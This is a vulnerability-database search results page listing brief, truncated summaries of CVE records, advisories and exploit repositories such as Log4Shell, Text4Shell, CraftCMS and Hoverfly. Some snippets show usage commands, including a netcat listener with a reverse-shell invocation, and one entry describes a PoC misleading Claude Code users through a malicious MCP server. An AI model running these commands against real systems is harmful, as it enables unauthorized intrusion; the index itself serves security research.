Lucene search
+L

1143125 matches found

Kitploit
Kitploit
added 2026/09/17 5:37 p.m.12 views

EXPLOIT-CVE-2021-44228

CVE-2021-44228 — Log4Shell PoC Lab DISCLAIMER This lab was created exclusively for educational and security research purposes. All traffic occurs within an isolated Docker network. Do not use this material on real systems or without explicit authorization. Misuse may be a crime. Use responsibly...

10CVSS7.7AI score0.99999EPSS
SaveExploits375
Kitploit
Kitploit
added 2026/09/17 5:35 p.m.5 views

cve-2022-42889-text4shell

Install maven - maven-linux 1. Maven install to create the fat jar root@kitploit: mvn clean install 2. Docker build root@kitploit: docker build --tag=text4shell . 3. Docker run root@kitploit: docker run -p 80:8080 text4shell 4. Test the app root@kitploit: http://localhost/text4shell/attack?search...

9.8CVSS7.6AI score0.99931EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/17 5:35 p.m.9 views

log4j-vul

log4j-vul This project is just to show Apache Log4j2 Vulnerability - aka CVE-2021-44228 Java: java version "1.8.0121" Compile: from src folder javac -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar com\example\Log4jVul.java Execute\Run: from src folder java -classpath...

10CVSS7.9AI score0.99999EPSS
SaveExploits375References1
Kitploit
Kitploit
added 2026/09/17 5:31 p.m.8 views

CVE-2025-32432

CraftCMS CVE-2025-32432 Exploit Toolkit Exploitation tools for CraftCMS Remote Code Execution vulnerability based on SensePost research. 📁 File Description 🎯 Main Tools 1. finalpoc.py - Final optimized POC Supports information disclosure and remote code execution Automatic asset ID discovery...

10CVSS8.7AI score0.99785EPSS
SaveExploits20
Kitploit
Kitploit
added 2026/09/17 5:30 p.m.7 views

CVE-2026-42945

CVE-2026-42945 Security Detection Tool This is a CVE-2026-42945 static detection tool for defense and internal network investigation, used to check whether there are high-risk rewrite combinations in NGINX ngxhttprewritemodule related configurations. This project does not provide exploit code, do...

9.2CVSS8.5AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/17 5:30 p.m.7 views

CVE-2023-42115

CVE-2023-42115 Exim AUTH Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability. Build root@kitploit: git clone...

9.8CVSS9AI score0.09961EPSS
SaveExploits5
EUVD
EUVD
added 2026/09/17 5:30 p.m.9 views

EUVD-2026-82340

A vulnerability has been found in code-projects Matrimonial System 1.0. This vulnerability affects the function writepartnerprefs of the file /partnerpreference.php. Such manipulation of the argument education leads to sql injection. The attack can be executed remotely. The exploit has been...

7.5CVSS0.00269EPSS
SaveExploits0References6
Cvelist
Cvelist
added 2026/09/17 5:30 p.m.37 views

CVE-2026-92926 code-projects Matrimonial System partner_preference.php writepartnerprefs sql injection

A vulnerability has been found in code-projects Matrimonial System 1.0. This vulnerability affects the function writepartnerprefs of the file /partnerpreference.php. Such manipulation of the argument education leads to sql injection. The attack can be executed remotely. The exploit has been...

7.5CVSS0.00269EPSS
SaveExploits0References6
CVE
CVE
added 2026/09/17 5:30 p.m.12 views

CVE-2026-92926

A SQL injection vulnerability exists in code-projects Matrimonial System 1.0 , specifically in the writepartnerprefs function of /partner_preference.php. Manipulating the education argument allows a remote attacker with no authentication to inject SQL, resulting in low impact on confidentiality, ...

7.5CVSS0.00269EPSS
SaveExploits0References6
Vulnrichment
Vulnrichment
added 2026/09/17 5:30 p.m.10 views

CVE-2026-92926 code-projects Matrimonial System partner_preference.php writepartnerprefs sql injection

A vulnerability has been found in code-projects Matrimonial System 1.0. This vulnerability affects the function writepartnerprefs of the file /partnerpreference.php. Such manipulation of the argument education leads to sql injection. The attack can be executed remotely. The exploit has been...

7.5CVSS0.00269EPSS
SaveExploits0References6
Kitploit
Kitploit
added 2026/09/17 5:23 p.m.7 views

CVE-2022-42889

🚀 CVE-2022-42889 Text4Shell Exploit A Python exploit for CVE-2022-42889 Text4Shell, a critical remote code execution vulnerability in Apache Commons Text versions prior to 1.10.0. 📋 Table of Contents Description Vulnerability Details Affected Versions Exploit Features Requirements Usage Examples...

9.8CVSS7.9AI score0.99931EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/17 5:19 p.m.10 views

CVE-2026-7537

MDJM Event Management = 1.7.8.3 - Authenticated Administrator+ Arbitrary File Upload via 'mdjmemailuploadfile' Parameter The WordPress MDJM Event Management plugin version 1.7.8.3 and prior contains an arbitrary file upload vulnerability that allows authenticated administrators to upload maliciou...

7.2CVSS6.3AI score0.00659EPSS
SaveExploits1References1
Kitploit
Kitploit
added 2026/09/17 5:18 p.m.9 views

HTB-Silentium-Writeup

HTB - Silentium Writeup Machine Info Name: Silentium OS: Linux Difficulty: Easy CVEs: CVE-2025-58434, CVE-2025-59528, CVE-2025-8110 Enumeration Nmap Scan root@kitploit: nmap -sC -sV -p- --min-rate 5000 -oN nmap.txt Open ports: 22 SSH, 80 HTTP Virtual Hostsstaging.silentium.htb runs Flowise 3.0.5...

10CVSS7.4AI score0.86218EPSS
SaveExploits53References3
OSV
OSV
added 2026/09/17 5:17 p.m.6 views

AZL-102567 CVE-2026-90140 affecting package kernel 6.6.150.1-1

In the Linux kernel, the following vulnerability has been resolved: cuse: wait for pending RCU callbacks on module exit Since commit 053fc4f755ad "fuse: fix UAF in rcu pathwalks", fuseconnput frees the fuseconn through callrcu rather than synchronously. For cuse, fc-release is cusefcrelease, whic...

0.00205EPSS
SaveExploits0References1
NVD
NVD
added 2026/09/17 5:16 p.m.8 views

CVE-2026-28326

SolarWinds Access Rights Manager was reported to be affected by an unauthenticated remote code execution vulnerability. The issue stems from a hardcoded static key...

8.8CVSS0.00548EPSS
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/17 5:16 p.m.8 views

Claude-Code-MCP-Injection-PoC

Claude Code: MCP Tool Confirmation Prompt Misrepresentation A professional Proof-of-Concept PoC demonstrating a critical UI/UX flaw in Anthropic's Claude Code. This vulnerability allows a malicious MCP server to mislead users into approving arbitrary command execution by misrepresenting tool...

8.8CVSS6.4AI score0.26364EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/17 5:16 p.m.11 views

CVE-2025-54123

CVE-2025-54123 Hoverfly CVE RCE Usage Command execution: root@kitploit: python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -c whoami Reverse Shell: root@kitploit: nc -lvnp 443 root@kitploit: python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -r $IP 443...

9.8CVSS8.4AI score0.10543EPSS
SaveExploits7
EUVD
EUVD
added 2026/09/17 5:15 p.m.9 views

EUVD-2026-80873

oras-go: Arbitrary file write outside file.Store root via symlink-chain bypass in tar extraction pushDir...

8.8CVSS0.00667EPSS
SaveExploits0References4
EUVD
EUVD
added 2026/09/17 5:15 p.m.18 views

EUVD-2026-48244

Grav: FlexDirectory::dynamicDataField executes arbitrary callables from blueprint data with no validation...

8.8CVSS6.7AI score0.00849EPSS
SaveExploits0References4
IBM Security Bulletins
IBM Security Bulletins
added 2026/09/17 5:06 p.m.9 views

Security Bulletin: IBM Guardium Data Protection is affected by multiple vulnerabilities.

Summary IBM Guardium Data Protection has addressed these vulnerabilities in an update. Vulnerability Details CVEID:CVE-2026-84031 DESCRIPTION: IBM Guardium Data Protection could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of input during web page...

9.9CVSS0.01452EPSS
SaveExploits0Affected Software1
Rows per page
Query Builder